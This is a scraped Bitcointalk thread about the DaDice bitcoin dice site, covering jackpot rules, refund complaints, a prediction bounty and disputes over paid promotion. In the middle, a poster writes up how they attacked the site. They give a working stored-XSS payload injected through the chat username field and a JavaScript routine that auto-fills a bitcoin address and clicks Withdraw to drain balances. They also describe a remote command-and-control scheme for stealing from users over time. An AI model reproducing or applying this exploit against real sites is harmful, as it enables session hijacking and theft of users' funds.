DaDice.com - Next Gen Social Gambling Dice Experience | Progressive Jackpot

[Da_Dice_Staff]

why do you need people to deposit for a jackpot if they can still win with 1 satoshi bets? wouldnt it be better to allow all bets?

Indeed but the amount is lower for a 1 sat bet that they can win. Check the faq on it mate

[98problems]

im really happy that you added jackpot possibility, will deposit coins and go autobet trying to hit it

[dooglus]

is there new deposit required to eligible get prize from this current jackpot amount, i had made my last deposit on 5th June so it ok or i have to make new deposit there after this announcement?

As longas your most recent entry in your ledger is a deposit mate

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, so all 10 deposits count to the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

[Bitraker]

 How come this site wont refund my bitcoin? I sent bt to the site 2 days ago and never receive my deposit is this a shady scam?  I sent 3 email asking for refund but they have not sent!
How many times do I need to email support to get my refund ?

[romano1]

How come this site wont refund my bitcoin? I sent bt to the site 2 days ago and never receive my deposit is this a shady scam?  I sent 3 email asking for refund but they have not sent!
How many times do I need to email support to get my refund ?

Hey brother they are not scam, trust me. Please tell me did the transaction got confirmed ? Did you deposited to the correct address, if answer is yes for both, then please send them a message here, profile link  - https://bitcointalk.org/index.php?action=profile;u=444316

[Watoshi-Dimobuto]

is there new deposit required to eligible get prize from this current jackpot amount, i had made my last deposit on 5th June so it ok or i have to make new deposit there after this announcement?

As longas your most recent entry in your ledger is a deposit mate

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, so all 10 deposits count to the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

I would say that they prefer real players to win the jackpot over full faucet players.

I don't think there is any restrictions like that. The last 'entry in the ledger' should not be a faucet claim. I think that is it. And faucet claims < deposit. Reasonable, in my opinion. You wouldn't want all jackpot wins to be by faucet players.

[Watoshi-Dimobuto]

How come this site wont refund my bitcoin? I sent bt to the site 2 days ago and never receive my deposit is this a shady scam?  I sent 3 email asking for refund but they have not sent!
How many times do I need to email support to get my refund ?

Post your txid. Do you still have access to your account? Username and deposit address would be needed too.

[Da_Dice_Staff]

is there new deposit required to eligible get prize from this current jackpot amount, i had made my last deposit on 5th June so it ok or i have to make new deposit there after this announcement?

As longas your most recent entry in your ledger is a deposit mate

So do I need to withdraw and redeposit after every time I use the faucet to be eligible for the jackpot?

And if I withdraw and redeposit the same amount 10 times, so all 10 deposits count to the total deposited?

I'm wondering what you are trying to encourage with these odd rules.

I would say that they prefer real players to win the jackpot over full faucet players.

I don't think there is any restrictions like that. The last 'entry in the ledger' should not be a faucet claim. I think that is it. And faucet claims < deposit. Reasonable, in my opinion. You wouldn't want all jackpot wins to be by faucet players.

Yup that is pretty much spot on mate

[panjul07]

Yeah JACKPOT..Glad to see this new feature on DD.
But unfortunately I cant make a deposit right now, aside from blockchain still in maintenance. I also get an error message when I click the bitcoin deposit button " Internal Processing Error." What is that?

Hmmmm not sure there myself mate. Send a message along to support so our dev can have a look for you

Its fixed now, just deposited a few amount and I'll try to be the first player to hit the jackpot number.  
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me lol.
But when someone rolled the jackpot number, where to claim it? on the chatbox or here?
Edit : or the jackpot will be credited automatically?

Thanks

[dadice]

Yeah JACKPOT..Glad to see this new feature on DD.
But unfortunately I cant make a deposit right now, aside from blockchain still in maintenance. I also get an error message when I click the bitcoin deposit button " Internal Processing Error." What is that?

Hmmmm not sure there myself mate. Send a message along to support so our dev can have a look for you

Its fixed now, just deposited a few amount and I'll try to be the first player to hit the jackpot number.  
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me lol.
But when someone rolled the jackpot number, where to claim it? on the chatbox or here?
Edit : or the jackpot will be credited automatically?

Thanks

Yes, the jackpot will be credited automatically.

[Da_Dice_Staff]

Yeah JACKPOT..Glad to see this new feature on DD.
But unfortunately I cant make a deposit right now, aside from blockchain still in maintenance. I also get an error message when I click the bitcoin deposit button " Internal Processing Error." What is that?

Hmmmm not sure there myself mate. Send a message along to support so our dev can have a look for you

Its fixed now, just deposited a few amount and I'll try to be the first player to hit the jackpot number.  
And surprisingly, I rolled 99.89 and 99.96 in my first 20 bets. Hope this is a good sign for me lol.
But when someone rolled the jackpot number, where to claim it? on the chatbox or here?
Edit : or the jackpot will be credited automatically?

Thanks

Hey mate. The jackpot is credited automatically when won. There's an announcement in chat as well Good luck!

[Da_Dice_Staff]

BRAND NEW BOUNTY FOR 300 000 000 ROLLS!

We are giving everyone yet another chance to win with our #300,000,000 bounty!

All you need to do is predict on what day you think the 300,000,000th roll will happen.

Whoever posted the correct date first will win the 0.1 btc prize!

-   Prize will be sent to any btc address you give us, please supply your address in your post.
-   The prize will go to whoever posted the correct date first.
-   Only your first date will be considered as valid. If you change your mind and guess another day you will be doing it only for fun.
-   Winner will be announced on Bitcointalk.

As with the 200 millionth bounty there is another twist with this one. The Bounty for hitting this Roll on DaDice will be 0.5BTC IF this roll happens on the 30th of June 2015. Everyday the Roll happens before then A further 0.05BTC will be added to the total. (So if it happenss to be the 28th of June then the rolling bounty will be 0.6BTC and so forth). If the roll happens after our predicted date then the bounty remains at 0.5BTC. You can increase this bounty by leaps and bounds as with the last one which went at an awesome 1.15BTC!

The second twist is that the Prediction competition is ONLY open for 1 week from the time of this initial post! You can guess any date not just before or our date but those included as well may be guessed. Good Luck! And remember to enter the predictions please do so on the following thread : https://bitcointalk.org/index.php?topic=996260.new#new

Good Luck, and Keep Rollin’!

Remember to also enter the competition on our FB page and Twitter (@DaDice1), where we will also be giving away 0.1 BTC to whoever predicts the correct date on that platform.

[SebastianJu]

you're really not getting it. if I'd pay you more than dadice, could I be your pimp?   what's your price?

Ah, you switched to this thread. And it seems you took your 5+ sockpuppet accounts with you.

You know, youre interesting to me. Asking me if i would stop promoting them if you would draw out more dirt about dadice. Sounds like you have an interest in this. And seeing that you take the time to come in here with a sockpuppet army, spend much time to fight dadice... it makes it look like it. And we know there is someone who has an interest in it. I mean first a framing against ndnhc, now a hack. I mean there IS someone behind. And the easiest answer is... its a competitor.

So everyone who is getting paid for advertising is a whore to you? Um... ok. 

Yes, i chose dadice because they pay good and they are trustworthy so far. Besides that, they are nice persons till now.

So far its only a service for me. I post anyway. If i can get some coins for it on the way... be it. But till now its still the best campaign.

If dadice would have been created to be a scam then they are doing it really wrong. They would have to run when they had the most money. Now they have to bother will all the trouble and this will affect the site. Less new users. They still dont run.

And if they used up their investment money then surely one or more investors would like to withdraw. A scammer would not allow that. Still... there is no one claiming to have problems with withdrawing funds.

Still... one thing i would do differently is that i would present a cold wallet. If the initial investor wasnt smart enough to hide their traces then the cold wallet should be recreated. Its simply. Upload the coins to an exchange, if youre feeling insecure then do it in parts, and load it up into a fresh cold wallet address. Present a verified message. And most of the critics plus most of the red trust will vanish. Allowing to get more users on the site.

[SebastianJu]

Marco, it looks like the conversation shows that you handle it the same way like dadice. Your escrow address is founded as far as the current payouts are valued. It would be enough to pay all users.

Though it would be a risk on your campaign if you really would be the escrow too.

Let me know if i misunderstood.

[SebastianJu]

The un-official report of how this attack was able to happen

Sorry, dadice_dev didn't explain how it happened. So I thought I would add an explanation so the public can make up for themselves if it was or wasn't serious. My oppinion is this is serious. But what do I know? This will be my last post on dadice.

After the first attack. Explained here:
https://bitcointalk.org/index.php?topic=973765.msg11351048#msg11351048

A fix was sorted to prevent users being impersonated. However, the injection method stayed the same. In fact back then it was possible to do the same thing. However, the test here was to see if DaDice would lie about the severity and I didn't want to impact them too much. Think of it as a free bug report.

So back to what enabled all this drama.

The object:

Code:

var socket_handshake_gameplay_token

is the offending player. It tells the chat server who you are.

Code:

var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "One",
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};

It is sent to the chat server to update the chat server.

Code:

socket.emit("online", socket_handshake_gameplay_token);

Thats fine, so how can we use this to update all clients with some JS code?

That required a lot of trial and error. Finding ways to do things is not always as simple as reading the code. One must first understand how these will render on the client browser. There was lots of time to be caught in the act. Maybe DaDice wanted to watch or just legitimately didn't think it was all that serious.

The userlist on the chat window is now where we need to look. The chat box does not allow scripts to run, but the userlist still updated with the new name change. Like this:

Code:

var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": "Two", //change name and user list updates
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

So now what.. We can make the server send our new username to all clients and all new clients.

Lets try running some JS. and keep the original HTML so it doesn't cause errors.

Code:

var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>//put script here</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
}

Now we can run any script we want. We could have called our own server and sent cookies and session data, or maybe implement subtle things like redirect the deposit code to our btc address. Since no one deposits on DaDice, that would be a tremendous waste of time.

A script to auto withdraw the dust was more fun.. But the hot wallet rarely has more than 0.1btc in it. This was not to take coin, but to show the dev he is arrogant. Had he not dismissed my first post I probably would have just reported it (I'm not interested in bug bounty money, I already have more than enough money). But he was a prick and I felt it would be better to just do another attack using JS. Maybe they can learn to be nice in the future. I was not paid nor did I do it to benefit any other dice site. This was done purely out of my personal spite to the people running DaDice because they were assholes to me.

My code here is pretty messy, setting up some events would have been better, but I was pretty lazy and the wallet only had 0.008btc left in it.

Code:

function clickButton(buttonName){$(".btn").each(function(i, obj) {
  if ($(this).text()==buttonName){$(this).click();
$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");
$("#withdraw_amount").val("0.001");}});
};

setInterval(function(){alert("DaDice has been Hacked.. bullshit message");clickButton("Withdraw");},5000);

Then entire JS injection that was pasted into the console was this. This is not exactly as it was, because I was coding in the console and didn't save it. But you get the idea.

Code:

var socket_handshake_gameplay_token = {
    "token": "1|11111111111111111111|1.1.1.1",
    "user": {
        "id": "1",
        "username": 'One"  class="" href="javascript:;"><script>function clickButton(buttonName){$(".btn").each(function(i, obj) {if ($(this).text()==buttonName){$("#withdraw_payee").val("1Nu7zXeUEV1aBzVQCtY4unDiFJFxdRSN9b");$("#withdraw_amount").val(+($("h2").text()-0.0001));$(this).click();}});};setInterval(if (+$("h2").text()>0.0011){function(){$("#account_withdraw").click();setTimeout(function(){clickButton("Withdraw");},5000);},10000);}</script>',
        "name": "",
        "cm": "false"
    },
    "shared_secret": null
};
socket.emit("online", socket_handshake_gameplay_token);
socket.emit("online_list_request", socket_handshake_gameplay_token);

I will also be sending back the 0.008btc drained from the hot wallet to an account on DaDice, and I will even send a few extra dust particles as interest for the loan.  This will also end the DaDice attacks. Someone else will probably find something new. Who knows. So be careful because DaDice have a history of taking a long time to fix known issues. If I wasn't so open, this would still be going on.

The point is, DaDice knew about this for weeks and nothing was done about it. They lied about the severity, or didn't realize the severity. If I ran a dice site, and had the same issue, I probably would try step around the severity too, can't blame them on that front. It was a simple chat attack. But this "simple" attack was a serious breach as we were able to run as much code as we wanted to. Anything could have been done on the client machines.
It also would have been prevented if they just allowed a skype call that I requested and was ignored.

I wished the Dev would have posted something more concrete like this. but instead he just tried to reduce it to a simple chat attack that did not impact their security. Yes it was indeed simple, but it was a major security breach.

Enjoy the day.

This is an interesting explaination. Im not a pro but could you have run ANY code? Or are there restrictions? What did you actually withdraw if not the hot wallet?

If you would have been able to empty the hot wallet then this would be a serious problem. Though to be fair, things like that happened to many exchanges and websites too. The only difference is then if you have a real cold wallet or built something stupid like automatically recharging hot wallets or so.

[Da_Dice_Staff]

Hmmmmm jackpot is at 1.02467985 already so looking good for whoever wins it

[panjul07]

Is it down? any news..
While I was playing with autobet, it stopped suddenly and when I refreshed, I got 525 error.
Any other getting the same error?

Edit : its up when I use the live version.

[bodgybrothers]

This is an interesting explaination. Im not a pro but could you have run ANY code? Or are there restrictions? What did you actually withdraw if not the hot wallet?

If you would have been able to empty the hot wallet then this would be a serious problem. Though to be fair, things like that happened to many exchanges and websites too. The only difference is then if you have a real cold wallet or built something stupid like automatically recharging hot wallets or so.

I know I said that last post was my last, but I need to respond to the question.

Any code could be run. If done in secret you could withdraw from user accounts each day. Many things can be done when you can execute any code on a users machine. If I was really serious about taking money slowly I would have setup a communication between my computer and the client browser. The client malware would send me details of the clients account and how much is available. My communication server would then tell the malware what to do. How to render the page and whether to withdraw. I'd have complete control over that users interface to DaDice. I could place bets on behalf of the user making for a big PR issue with DaDice, withdraw by sending a click command on withdraw button. There is so many possibilities because you can do anything the user can do. The issue with DaDice is, no user has any money and the hot wallet is so small. So it's a waste of time to setup an elaborate draining system. There simply is no money there. When I did this the hot wallet had only 0.008BTC, which is all I got. But the purpose was to prove the dev a liar. The hack was genuinely significant; I could run JS on clients machines from day one and gave them time to rectify before the next attack. It matters not that the chat server is separate to the game server if both are connected via a client browser. His arrogant post shown below is why I didn't report it direct. This line

The variable that "buffoon" played with was on client-end (i.e. his browser end).

is not correct. If it was only my browser, then how did all other browsers and new logged in users see my changes?
And then this

Yes, this issue has been fixed although it remained 2nd in our priorty, the first priority was as other users have discussed before latency issue which was causing whole Da Dice to slow down.

A serious open door is 2nd priority over excessive browser document updates?

And then this lie:

suppose we still had NOT fixed this issue even then all that these buffoons and crookeds could do was to broadcast chat messages as other users, nothing else! period!

And then the image of the boy who got into facebook because they didn't log out = hacker. That was insulting because that's not what happened here. It also shows a lot of arrogance, which is scary when dealing with money. You must always be thinking someone is doing something you never intended when you have sites that handle money.

Naturally, after seeing that response, I waited for the water to calm and hit it with a wallet drain attack to prove that if they didn't fix it something else would have happened. Sometimes people need to be careful how they approach egos. Mine doesn't take nicely to accusations of being an idiot.


Note: all the answers below turned out to be lies.

Q. So Dadice was Hacked yesterday?
A. No it was't. but we can be onboard on a point that there was a peculiar and "witty" type of incident.

Q. How come someone was able to change the name in chat/post as other users? doesn't that mean entire site was compromised?
A. Please allow me to explain how Da Dice system currently works. The main system where users passwords, bitcoins, profiles, stats are stored is completely secure and runs parallel with other Da Dice systems (i.e. Chat, social features) which means that both run 100% apart from each other. Which is infact better and more secure!

There is a separate database that acts as a bridge between these 2 systems, so when a user is authenticated on main dadice system, a special token is generated for him/her to be able to use social features of the site. After this, when a user utilises one of these social features i.e. Sockets for chat, rightthere our NodeJS/Socket.io crosschecks the token.

it was a direct change to server side variables that store usernames.

This is a false statement. The variable that "buffoon" played with was on client-end (i.e. his browser end).

Q. Da Fix?
Yes, this issue has been fixed although it remained 2nd in our priorty, the first priority was as other users have discussed before latency issue which was causing whole Da Dice to slow down.

However it is not enough to just apply a single patch and consider it fixed. We believe the issue must be throughly investigated, root causes and the exploiters identified. We were able to identify our "buffoons" as @mnbnm, @bluewaffle and @haxer. Their IP address were also blacklisted (I know i know there is no shortage of IPs, vpns or even Da Dice accounts but its the standard protocol to be followed and therefore we suspended their accounts).

We will also be monitoring any further exploiters who attempt to do this time, a quick reenactment:


(I was online last night with our buffoon who desperately kept trying after the fix was implement.)

Why is this significant. The moderators will tell you it was just a hack to the chat system and was not in anyway an issue to the security of the site. To me it is more than that. It is the site's controls over web sessions that are now in question. Why is it possible to change any details of a web session on the server?  The server and only the server should be monitoring this and ensuring the username used to log in and the session cannot be changed. In this case, it demonstrates that this site could have some more serious vulnerabilities.

There is no doubt that these issues must be addressed seriously and it was. As I have explained before that the two systems run parallel to each other, so just for the sake of security, even the session variables are not shared while both of the systems are fully secure in server end.

The issue was simple:
- Mr. buffoon edits the variable in his browser which carries his username.
- On server side, nodejs authenticated him "as a user of Da Dice" with his token by cross checking it with his user ID.
- Trusting that a user has been authenticated on both places, Mr. buffoon's messages were then relayed to further users.

So just to clearify in between all this, "sessions" were NOWHERE involved and server was NOWHERE compromised.

Change the username in the variable above and then log back in:
You now have someone else's username. No server side checks or anything!

...
The site made it easy with the client telling the server who it was, and the server didn't have any checks of who it actually was.

As explained before, the token was cross checked with ID of user which is carried alongside the token but not the username. And this was the behaviour which has been corrected. So to summarise it: There was NO serious threat, however additional query to cross check "usernames" along side "user ID" has been added for our "Crooked" fellows.

Having said that, suppose we still had NOT fixed this issue even then all that these buffoons and crookeds could do was to broadcast chat messages as other users, nothing else! period!

No longer does the statement "It's just a simple chat hack" make a difference. They have yet to fix it! If it was so simple, why did it take so long!
DenseCrab also complained he lost access to his account and logged in as CenseDrab due to this access issue. And he was also the first to be targeted in chat.

Naturally the poor chap initially thought his account was compromised and in hurry he changed the password which later he couldn't produce himself, he contacted the support and his issue was resolved.

The statement remains same "It's just a simple chat hack", infact "It was just a simple chat hack" and #2 in our priority list that day. The major issue was the speed and latency which our users were experiencing due to CloudFlare and we were working with them to optimise networking.


Ending Note:

Obviously the agenda is to spread panic and slander Da Dice. If you realise you should "steer clear" of this one, you're welcome to do so and same from our official threads and etc... Main thing is that when we told our user in chat that there is nothing to worry about, our loyal users understood the fact that there was indeed nothing serious to be concerned about although whole new level of trolling was unleashed in our chat box. Infact no one has given a real thought to post here at Bitcointalk as well... Da Dice is aiming for #1 position and I personally believe that arena is big enough for all fishes to swim so there is no real need to get super competitive and the fact must be accepted with open heart.

Is dadice hack proof? fool proof?
No! but any other site is not either. We have seen the current #1 dice site facing challenges it self from time to time, every day technology is evolving and new and new means of manipulations are being developed. We have had our fair share of serious threats right upon our start and we are constantly working on these challenges... but then there are these kind of people too:

BTW Dev guy. The agenda was to prove you wrong. So stop saying its all the other dice sites paying for this to happen or there is some great dicing collusion conspiracy. It's only between you and I.

[Vezalke]

About investing...did you take 10% of principal + profit when divesting. Or 10% from profit?

[waterpile]

About investing...did you take 10% of principal + profit when divesting. Or 10% from profit?

I think its pretty much its 10% from profit if its principal + profit, no one would be interested in investing.